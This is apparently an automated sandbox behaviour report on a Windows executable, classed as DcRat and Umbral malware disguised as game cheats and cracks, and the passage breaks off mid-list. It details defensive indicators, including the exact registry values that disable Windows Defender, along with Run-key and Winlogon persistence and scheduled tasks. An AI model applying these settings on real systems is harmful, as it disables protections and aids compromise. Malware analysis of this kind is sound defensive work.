Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
31-10-2024 02:05
Behavioral task
behavioral1
Sample
11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exe
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exe
Resource
win10v2004-20241007-en
General
-
Target
11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exe
-
Size
12.9MB
-
MD5
e3a480a53d8b2c398a7642e1f4e84785
-
SHA1
7f8fa5e3dc9be9055f9202213be33460a1af1e09
-
SHA256
11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2
-
SHA512
b3fce5ac73b75fb70d6c798517426ee614b72f24236baf07752f1289a8ce78d74c3c1ec5168f1d8fbcaa5b7de072ef3175f895ac1a49379f716209df49d103e8
-
SSDEEP
393216:oJlQ1evI2bs6Yuno3rkJ3InoKasOnHDJaM8t:obQpgssCKInwjJaMu
Malware Config
Signatures
-
DcRat 11 IoCs
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
Processes:
schtasks.exeschtasks.exeportrefNet.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exeschtasks.exeschtasks.exeschtasks.exepid process 4000 schtasks.exe 4028 schtasks.exe File created C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\0a1fd5f707cd16 portrefNet.exe 2424 schtasks.exe 1456 schtasks.exe 2080 schtasks.exe 4872 schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exe 2912 schtasks.exe 4964 schtasks.exe 3896 schtasks.exe -
Dcrat family
-
Detect Umbral payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\52cheatand52rat.exe family_umbral behavioral2/memory/5056-12-0x000001F607390000-0x000001F6073D0000-memory.dmp family_umbral behavioral2/memory/2728-26-0x0000000000400000-0x00000000010F7000-memory.dmp family_umbral -
Modifies WinLogon for persistence 2 TTPs 3 IoCs
Processes:
portrefNet.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\sppsvc.exe\", \"C:\\Windows\\RemotePackages\\RemoteApps\\services.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\sppsvc.exe\", \"C:\\Windows\\RemotePackages\\RemoteApps\\services.exe\", \"C:\\blockweb\\smss.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\sppsvc.exe\"" portrefNet.exe -
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe -
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Process spawned unexpected child process 9 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2424 4104 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1456 4104 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2080 4104 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2912 4104 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4964 4104 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4872 4104 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3896 4104 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4000 4104 schtasks.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4028 4104 schtasks.exe -
Umbral family
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe dcrat C:\blockweb\portrefNet.exe dcrat behavioral2/memory/4692-105-0x0000000000C20000-0x0000000000E5A000-memory.dmp dcrat -
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeportrefNet.exe11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exePrimordial Crack.exeLunch LaCheatV2.exeLunch LaCheat.exeDCRatBuild.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation portrefNet.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation 11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Primordial Crack.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Lunch LaCheatV2.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation Lunch LaCheat.exe Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation DCRatBuild.exe -
Executes dropped EXE 8 IoCs
Processes:
52cheatand52rat.exePrimordial Crack.exeLunch LaCheatV2.exeLunch LaCheat.exeDCRatBuild.exe52cheatand52rat.exeportrefNet.exesmss.exepid process 5056 52cheatand52rat.exe 1004 Primordial Crack.exe 3312 Lunch LaCheatV2.exe 2072 Lunch LaCheat.exe 4032 DCRatBuild.exe 1136 52cheatand52rat.exe 4692 portrefNet.exe 3520 smss.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\Lunch LaCheatV2.exe vmprotect behavioral2/memory/3312-50-0x0000000000400000-0x0000000001B6B000-memory.dmp vmprotect C:\Users\Admin\AppData\Local\Temp\Lunch LaCheat.exe vmprotect behavioral2/memory/2072-67-0x0000000000400000-0x00000000018F3000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 6 IoCs
Processes:
portrefNet.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\blockweb\\smss.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\sppsvc.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\sppsvc = "\"C:\\Program Files\\Microsoft Office\\Updates\\Apply\\FilesInUse\\sppsvc.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Windows\\RemotePackages\\RemoteApps\\services.exe\"" portrefNet.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\services = "\"C:\\Windows\\RemotePackages\\RemoteApps\\services.exe\"" portrefNet.exe Set value (str) \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "\"C:\\blockweb\\smss.exe\"" portrefNet.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 11 ip-api.com -
Modifies Security services 2 TTPs 8 IoCs
Modifies the startup behavior of a security service.
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" reg.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" reg.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
Lunch LaCheatV2.exeLunch LaCheat.exepid process 3312 Lunch LaCheatV2.exe 2072 Lunch LaCheat.exe -
Drops file in Program Files directory 3 IoCs
Processes:
portrefNet.exedescription ioc process File opened for modification C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\sppsvc.exe portrefNet.exe File created C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\0a1fd5f707cd16 portrefNet.exe File created C:\Program Files\Microsoft Office\Updates\Apply\FilesInUse\sppsvc.exe portrefNet.exe -
Drops file in Windows directory 2 IoCs
Processes:
portrefNet.exedescription ioc process File created C:\Windows\RemotePackages\RemoteApps\services.exe portrefNet.exe File created C:\Windows\RemotePackages\RemoteApps\c5b4cb5e9653cc portrefNet.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
reg.exereg.exereg.exereg.exereg.exeschtasks.exeschtasks.exereg.exeschtasks.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exeschtasks.exereg.execmd.exereg.exeLunch LaCheatV2.exereg.exeWScript.execmd.exereg.exeschtasks.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exeschtasks.exeschtasks.exereg.exeWScript.exePrimordial Crack.exereg.exereg.exeschtasks.exereg.exereg.exereg.exereg.exeDCRatBuild.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exeschtasks.exereg.exe11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exeschtasks.execmd.exeLunch LaCheat.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Lunch LaCheatV2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Primordial Crack.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DCRatBuild.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Lunch LaCheat.exe -
Modifies registry class 2 IoCs
Processes:
DCRatBuild.exeportrefNet.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings DCRatBuild.exe Key created \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000_Classes\Local Settings portrefNet.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 9 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 2080 schtasks.exe 2912 schtasks.exe 2424 schtasks.exe 1456 schtasks.exe 4964 schtasks.exe 4872 schtasks.exe 3896 schtasks.exe 4000 schtasks.exe 4028 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 12 IoCs
Processes:
Lunch LaCheatV2.exeLunch LaCheat.exeportrefNet.exesmss.exepid process 3312 Lunch LaCheatV2.exe 3312 Lunch LaCheatV2.exe 3312 Lunch LaCheatV2.exe 3312 Lunch LaCheatV2.exe 2072 Lunch LaCheat.exe 2072 Lunch LaCheat.exe 2072 Lunch LaCheat.exe 2072 Lunch LaCheat.exe 4692 portrefNet.exe 4692 portrefNet.exe 4692 portrefNet.exe 3520 smss.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
52cheatand52rat.exewmic.exe52cheatand52rat.exewmic.exedescription pid process Token: SeDebugPrivilege 5056 52cheatand52rat.exe Token: SeIncreaseQuotaPrivilege 2700 wmic.exe Token: SeSecurityPrivilege 2700 wmic.exe Token: SeTakeOwnershipPrivilege 2700 wmic.exe Token: SeLoadDriverPrivilege 2700 wmic.exe Token: SeSystemProfilePrivilege 2700 wmic.exe Token: SeSystemtimePrivilege 2700 wmic.exe Token: SeProfSingleProcessPrivilege 2700 wmic.exe Token: SeIncBasePriorityPrivilege 2700 wmic.exe Token: SeCreatePagefilePrivilege 2700 wmic.exe Token: SeBackupPrivilege 2700 wmic.exe Token: SeRestorePrivilege 2700 wmic.exe Token: SeShutdownPrivilege 2700 wmic.exe Token: SeDebugPrivilege 2700 wmic.exe Token: SeSystemEnvironmentPrivilege 2700 wmic.exe Token: SeRemoteShutdownPrivilege 2700 wmic.exe Token: SeUndockPrivilege 2700 wmic.exe Token: SeManageVolumePrivilege 2700 wmic.exe Token: 33 2700 wmic.exe Token: 34 2700 wmic.exe Token: 35 2700 wmic.exe Token: 36 2700 wmic.exe Token: SeIncreaseQuotaPrivilege 2700 wmic.exe Token: SeSecurityPrivilege 2700 wmic.exe Token: SeTakeOwnershipPrivilege 2700 wmic.exe Token: SeLoadDriverPrivilege 2700 wmic.exe Token: SeSystemProfilePrivilege 2700 wmic.exe Token: SeSystemtimePrivilege 2700 wmic.exe Token: SeProfSingleProcessPrivilege 2700 wmic.exe Token: SeIncBasePriorityPrivilege 2700 wmic.exe Token: SeCreatePagefilePrivilege 2700 wmic.exe Token: SeBackupPrivilege 2700 wmic.exe Token: SeRestorePrivilege 2700 wmic.exe Token: SeShutdownPrivilege 2700 wmic.exe Token: SeDebugPrivilege 2700 wmic.exe Token: SeSystemEnvironmentPrivilege 2700 wmic.exe Token: SeRemoteShutdownPrivilege 2700 wmic.exe Token: SeUndockPrivilege 2700 wmic.exe Token: SeManageVolumePrivilege 2700 wmic.exe Token: 33 2700 wmic.exe Token: 34 2700 wmic.exe Token: 35 2700 wmic.exe Token: 36 2700 wmic.exe Token: SeDebugPrivilege 1136 52cheatand52rat.exe Token: SeIncreaseQuotaPrivilege 4576 wmic.exe Token: SeSecurityPrivilege 4576 wmic.exe Token: SeTakeOwnershipPrivilege 4576 wmic.exe Token: SeLoadDriverPrivilege 4576 wmic.exe Token: SeSystemProfilePrivilege 4576 wmic.exe Token: SeSystemtimePrivilege 4576 wmic.exe Token: SeProfSingleProcessPrivilege 4576 wmic.exe Token: SeIncBasePriorityPrivilege 4576 wmic.exe Token: SeCreatePagefilePrivilege 4576 wmic.exe Token: SeBackupPrivilege 4576 wmic.exe Token: SeRestorePrivilege 4576 wmic.exe Token: SeShutdownPrivilege 4576 wmic.exe Token: SeDebugPrivilege 4576 wmic.exe Token: SeSystemEnvironmentPrivilege 4576 wmic.exe Token: SeRemoteShutdownPrivilege 4576 wmic.exe Token: SeUndockPrivilege 4576 wmic.exe Token: SeManageVolumePrivilege 4576 wmic.exe Token: 33 4576 wmic.exe Token: 34 4576 wmic.exe Token: 35 4576 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.execmd.exe52cheatand52rat.exePrimordial Crack.execmd.exedescription pid process target process PID 2728 wrote to memory of 5056 2728 11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exe 52cheatand52rat.exe PID 2728 wrote to memory of 5056 2728 11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exe 52cheatand52rat.exe PID 2728 wrote to memory of 1004 2728 11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exe Primordial Crack.exe PID 2728 wrote to memory of 1004 2728 11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exe Primordial Crack.exe PID 2728 wrote to memory of 1004 2728 11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exe Primordial Crack.exe PID 2728 wrote to memory of 3308 2728 11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exe cmd.exe PID 2728 wrote to memory of 3308 2728 11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exe cmd.exe PID 2728 wrote to memory of 3308 2728 11e550c201ee70fb01902b1e84b19a133c0861e170c764db9d8755be67fdcde2.exe cmd.exe PID 3308 wrote to memory of 1196 3308 cmd.exe reg.exe PID 3308 wrote to memory of 1196 3308 cmd.exe reg.exe PID 3308 wrote to memory of 1196 3308 cmd.exe reg.exe PID 3308 wrote to memory of 4280 3308 cmd.exe reg.exe PID 3308 wrote to memory of 4280 3308 cmd.exe reg.exe PID 3308 wrote to memory of 4280 3308 cmd.exe reg.exe PID 3308 wrote to memory of 2960 3308 cmd.exe reg.exe PID 3308 wrote to memory of 2960 3308 cmd.exe reg.exe PID 3308 wrote to memory of 2960 3308 cmd.exe reg.exe PID 5056 wrote to memory of 2700 5056 52cheatand52rat.exe wmic.exe PID 5056 wrote to memory of 2700 5056 52cheatand52rat.exe wmic.exe PID 3308 wrote to memory of 4028 3308 cmd.exe reg.exe PID 3308 wrote to memory of 4028 3308 cmd.exe reg.exe PID 3308 wrote to memory of 4028 3308 cmd.exe reg.exe PID 1004 wrote to memory of 3312 1004 Primordial Crack.exe Lunch LaCheatV2.exe PID 1004 wrote to memory of 3312 1004 Primordial Crack.exe Lunch LaCheatV2.exe PID 1004 wrote to memory of 3312 1004 Primordial Crack.exe Lunch LaCheatV2.exe PID 1004 wrote to memory of 3896 1004 Primordial Crack.exe cmd.exe PID 1004 wrote to memory of 3896 1004 Primordial Crack.exe cmd.exe PID 1004 wrote to memory of 3896 1004 Primordial Crack.exe cmd.exe PID 3896 wrote to memory of 1780 3896 cmd.exe reg.exe PID 3896 wrote to memory of 1780 3896 cmd.exe reg.exe PID 3896 wrote to memory of 1780 3896 cmd.exe reg.exe PID 3308 wrote to memory of 4524 3308 cmd.exe reg.exe PID 3308 wrote to memory of 4524 3308 cmd.exe reg.exe PID 3308 wrote to memory of 4524 3308 cmd.exe reg.exe PID 3308 wrote to memory of 1152 3308 cmd.exe reg.exe PID 3308 wrote to memory of 1152 3308 cmd.exe reg.exe PID 3308 wrote to memory of 1152 3308 cmd.exe reg.exe PID 3308 wrote to memory of 1136 3308 cmd.exe 52cheatand52rat.exe PID 3308 wrote to memory of 1136 3308 cmd.exe 52cheatand52rat.exe PID 3308 wrote to memory of 1136 3308 cmd.exe 52cheatand52rat.exe PID 3896 wrote to memory of 2252 3896 cmd.exe reg.exe PID 3896 wrote to memory of 2252 3896 cmd.exe reg.exe PID 3896 wrote to memory of 2252 3896 cmd.exe reg.exe PID 3308 wrote to memory of 2576 3308 cmd.exe reg.exe PID 3308 wrote to memory of 2576 3308 cmd.exe reg.exe PID 3308 wrote to memory of 2576 3308 cmd.exe reg.exe PID 3896 wrote to memory of 632 3896 cmd.exe reg.exe PID 3896 wrote to memory of 632 3896 cmd.exe reg.exe PID 3896 wrote to memory of 632 3896 cmd.exe reg.exe PID 3308 wrote to memory of 2324 3308 cmd.exe reg.exe PID 3308 wrote to memory of 2324 3308 cmd.exe reg.exe PID 3308 wrote to memory of 2324 3308 cmd.exe reg.exe PID 3308 wrote to memory of 3428 3308 cmd.exe reg.exe PID 3308 wrote to memory of 3428 3308 cmd.exe reg.exe PID 3308 wrote to memory of 3428 3308 cmd.exe reg.exe PID 3896 wrote to memory of 996 3896 cmd.exe reg.exe PID 3896 wrote to memory of 996 3896 cmd.exe reg.exe PID 3896 wrote to memory of 996 3896 cmd.exe reg.exe PID 3308 wrote to memory of 2692 3308 cmd.exe WScript.exe PID 3308 wrote to memory of 2692 3308 cmd.exe WScript.exe PID 3308 wrote to memory of 2692 3308 cmd.exe WScript.exe PID 3308 wrote to memory of 